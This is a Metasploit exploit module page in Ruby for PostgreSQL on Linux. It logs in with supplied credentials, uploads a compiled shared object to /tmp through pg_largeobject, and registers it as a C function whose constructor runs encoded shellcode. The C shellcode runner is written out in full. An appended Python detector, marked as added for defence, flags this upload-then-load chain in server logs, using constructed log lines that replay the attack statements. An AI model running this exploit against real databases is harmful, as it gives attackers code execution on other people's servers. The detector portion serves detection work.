PostgreSQL for Linux Payload Execution
Source: http://www.metasploit.com   Author: todb   Published: 2012-12-14

###
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'msf/core/exploit/postgres'

class Metasploit3 < Msf::Exploit::Remote
 Rank = ExcellentRanking

 include Msf::Exploit::Remote::Postgres
 include Msf::Auxiliary::Report

 # Creates an instance of this module.
 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'PostgreSQL for Linux Payload Execution',
   'Description'    => %q{
    On some default Linux installations of PostgreSQL, the
    postgres service account may write to the /tmp directory, and
    may load UDF shared libraries from there as well, allowing
    execution of arbitrary code.

    This module compiles a Linux shared object file, uploads it to
    the target host via the UPDATE pg_largeobject method of binary
    injection, and creates a UDF (user defined function) from that
    shared object. Because the payload is run as the shared object's
    constructor, it does not need to conform to specific Postgres
    API versions.
   },
   'Author'         =>
   [
    'midnitesnake', # this Metasploit module
    'egypt',        # on-the-fly compiled .so technique
    'todb'          # original windows module this is based on
   ],
   'License'        => MSF_LICENSE,
   'Version'        => '$Revision$',
   'References'     =>
    [
     [ 'URL', 'http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt' ]
    ],
   'Platform'       => 'linux',
   'Payload'        =>
    {
     'Space'    => 65535,
     'DisableNops'  => true,
    },
   'Targets'        =>
    [
     [ 'Linux x86',       { 'Arch' => ARCH_X86 } ],
     [ 'Linux x86_64',    { 'Arch' => ARCH_X86_64 } ],
    ],
   'DefaultTarget'  => 0,
   'DisclosureDate' => 'Jun 05 2007'

   ))

  deregister_options('SQL', 'RETURN_ROWSET')
 end

 # Buncha stuff to make typing easier.
 def username; datastore['USERNAME']; end
 def password; datastore['PASSWORD']; end
 def database; datastore['DATABASE']; end
 def rhost; datastore['rhost']; end
 def rport; datastore['rport']; end
 def verbose; datastore['VERBOSE']; end
 def bits; datastore['BITS']; end

 def execute_command(cmd, opts)
  postgres_sys_exec(cmd)
 end

 def exploit
  version = do_login(username,password,database)
  case version
  when :noauth; print_error "Authentication failed."; return
  when :noconn; print_error "Connection failed."; return
  else
   print_status("#{rhost}:#{rport} - #{version}")
  end

  fname = "/tmp/#{Rex::Text.rand_text_alpha(8)}.so"
  tbl,fld,so,oid = postgres_upload_binary_data(payload_so(fname), fname)

  unless tbl && fld && so && oid
   print_error "Could not upload the UDF SO"
   return
  end

  print_status "Uploaded #{so} as OID #{oid} to table #{tbl}(#{fld})"
  begin
   func_name = Rex::Text.rand_text_alpha(10)
   postgres_query(
    "create or replace function pg_temp.#{func_name}()"+
    " returns void as '#{so}','#{func_name}'"+
    " language 'C' strict immutable"
   )
  rescue
  end
  postgres_logout if @postgres_conn

 end


 # Authenticate to the postgres server.
 #
 # Returns the version from #postgres_fingerprint
 def do_login(user=nil,pass=nil,database=nil)
  begin
   password = pass || postgres_password
   vprint_status("Trying #{user}:#{password}@#{rhost}:#{rport}/#{database}")
   result = postgres_fingerprint(
    :db => database,
    :username => user,
    :password => password
   )
   if result[:auth]
    report_service(
     :host => rhost,
     :port => rport,
     :name => "postgres",
     :info => result.values.first
    )
    return result[:auth]
   else
    return :noauth
   end
  rescue Rex::ConnectionError, Rex::Post::Meterpreter::RequestError
   return :noconn
  end
 end


 def payload_so(filename)
  shellcode = Rex::Text.to_hex(payload.encoded, "\\x")
  #shellcode = "\\xcc"

  c = %Q^
   int _exit(int);
   int printf(const char*, ...);
   int perror(const char*);
   void *mmap(int, int, int, int, int, int);
   void *memcpy(void *, const void *, int);
   int mprotect(void *, int, int);
   int fork();
   int unlink(const char *pathname);

   #define MAP_PRIVATE 2
   #define MAP_ANONYMOUS 32
   #define PROT_READ 1
   #define PROT_WRITE 2
   #define PROT_EXEC 4

   #define PAGESIZE 0x1000

   char shellcode[] = "#{shellcode}";

   void run_payload(void) __attribute__((constructor));

   void run_payload(void)
   {
    int (*fp)();
    fp = mmap(0, PAGESIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);

    memcpy(fp, shellcode, sizeof(shellcode));
    if (mprotect(fp, PAGESIZE, PROT_READ|PROT_WRITE|PROT_EXEC)) {
     _exit(1);
    }
    if (!fork()) {
     fp();
    }

    unlink("#{filename}"); /* remove the uploaded .so once the payload has been launched */
    return;
   }

  ^

  cpu = case target_arch.first
   when ARCH_X86; Metasm::Ia32.new
   when ARCH_X86_64; Metasm::X86_64.new
   end
  payload_so = Metasm::ELF.compile_c(cpu, c, "payload.c")

  so_file = payload_so.encode_string(:lib)

  so_file
 end
end
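A defender-side complement to the module description, added here as an example that is not part of the original page or of Metasploit: a Python detector that scans PostgreSQL server log lines for the upload-then-load chain the description outlines, namely direct writes to the pg_largeobject catalog, lo_export to a path outside an allowlisted directory, and CREATE FUNCTION ... LANGUAGE C pointing at a library outside $libdir. It assumes log_statement = 'all' and a log_line_prefix of '%t [%p] %u@%d '; the log lines, session identifiers, table and function names, OID and export allowlist are all constructed for the example.

```python
import re
from collections import defaultdict

# Constructed sample of PostgreSQL server log lines (log_line_prefix '%t [%p] %u@%d ',
# log_statement = 'all') mimicking the sequence the module description outlines:
# stage a shared object through pg_largeobject, export it to /tmp, then register it as a
# C-language UDF. Names, OID and the hex blob are made up for the example.
SAMPLE_LOG = """\
2012-12-14 10:01:02 UTC [4242] postgres@postgres LOG:  statement: select version()
2012-12-14 10:01:03 UTC [4242] postgres@postgres LOG:  statement: CREATE TABLE abcdefgh (data bytea)
2012-12-14 10:01:03 UTC [4242] postgres@postgres LOG:  statement: SELECT lo_create(12345)
2012-12-14 10:01:04 UTC [4242] postgres@postgres LOG:  statement: UPDATE pg_largeobject SET data = decode('7f454c460201', 'hex') WHERE loid = 12345
2012-12-14 10:01:05 UTC [4242] postgres@postgres LOG:  statement: SELECT lo_export(12345, '/tmp/abcdefgh.so')
2012-12-14 10:01:05 UTC [4242] postgres@postgres LOG:  statement: create or replace function pg_temp.qwertyuiop() returns void as '/tmp/abcdefgh.so','qwertyuiop' language 'C' strict immutable
2012-12-14 10:02:00 UTC [4300] app@shop LOG:  statement: SELECT id FROM orders WHERE customer = 17
"""

# Parses one line in the assumed prefix style: '<timestamp> [<pid>] <user>@<db> LOG:  statement: <sql>'.
LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>[^@\s]+)@(?P<db>\S+) "
    r"LOG:\s+statement: (?P<sql>.*)$"
)

# Rule 1: applications use the lo_* API; DML directly against the catalog is rare.
CATALOG_WRITE_RE = re.compile(r"\b(update|insert\s+into|delete\s+from)\s+pg_largeobject\b", re.I)
# Rule 2: lo_export writes a server-side file; flag destinations outside an allowlist.
LO_EXPORT_RE = re.compile(r"\blo_export\s*\(\s*\d+\s*,\s*'([^']*)'", re.I)
ALLOWED_EXPORT_DIRS = ("/var/lib/postgresql/exports/",)  # constructed allowlist
# Rule 3: a C-language function whose object file is not under $libdir.
C_FUNCTION_RE = re.compile(
    r"\bcreate\s+(?:or\s+replace\s+)?function\b.*?\bas\s+'([^']*)'\s*,\s*'[^']*'"
    r".*?\blanguage\s+'?c'?(?!\w)",
    re.I | re.S,
)
TRUSTED_LIB_PREFIX = "$libdir"


def classify_statement(sql):
    """Return the suspicious-behaviour tags that apply to a single SQL statement."""
    tags = []
    if CATALOG_WRITE_RE.search(sql):
        tags.append("pg_largeobject_direct_write")
    m = LO_EXPORT_RE.search(sql)
    if m and not m.group(1).startswith(ALLOWED_EXPORT_DIRS):
        tags.append("lo_export_to_untrusted_path:" + m.group(1))
    m = C_FUNCTION_RE.search(sql)
    if m and not m.group(1).startswith(TRUSTED_LIB_PREFIX):
        tags.append("c_udf_outside_libdir:" + m.group(1))
    return tags


def analyze_log(log_text):
    """Group hits by backend session (pid:user@db) and rate each session.

    A session that both stages a file (catalog write or untrusted lo_export) and
    registers a C UDF outside $libdir is rated critical; anything else medium.
    """
    per_session = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        session = f"{m['pid']}:{m['user']}@{m['db']}"
        for tag in classify_statement(m["sql"]):
            per_session[session].append((m["ts"], tag))

    findings = []
    for session, hits in per_session.items():
        kinds = {tag.split(":", 1)[0] for _, tag in hits}
        staged = bool(kinds & {"pg_largeobject_direct_write", "lo_export_to_untrusted_path"})
        loaded = "c_udf_outside_libdir" in kinds
        findings.append({
            "session": session,
            "hits": hits,
            "severity": "critical" if staged and loaded else "medium",
        })
    return findings


if __name__ == "__main__":
    for finding in analyze_log(SAMPLE_LOG):
        print(finding["severity"].upper(), finding["session"])
        for ts, tag in finding["hits"]:
            print("   ", ts, tag)
```

CREATE FUNCTION ... LANGUAGE C is superuser-only, so legitimate occurrences are rare enough that rule 3 alone is a low-noise alert; the session grouping mainly serves to tie the staging statements to it for triage. The cheaper preventive controls the description implies are not to let application roles hold superuser and to ensure the postgres service account cannot write to directories from which the server will load libraries.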

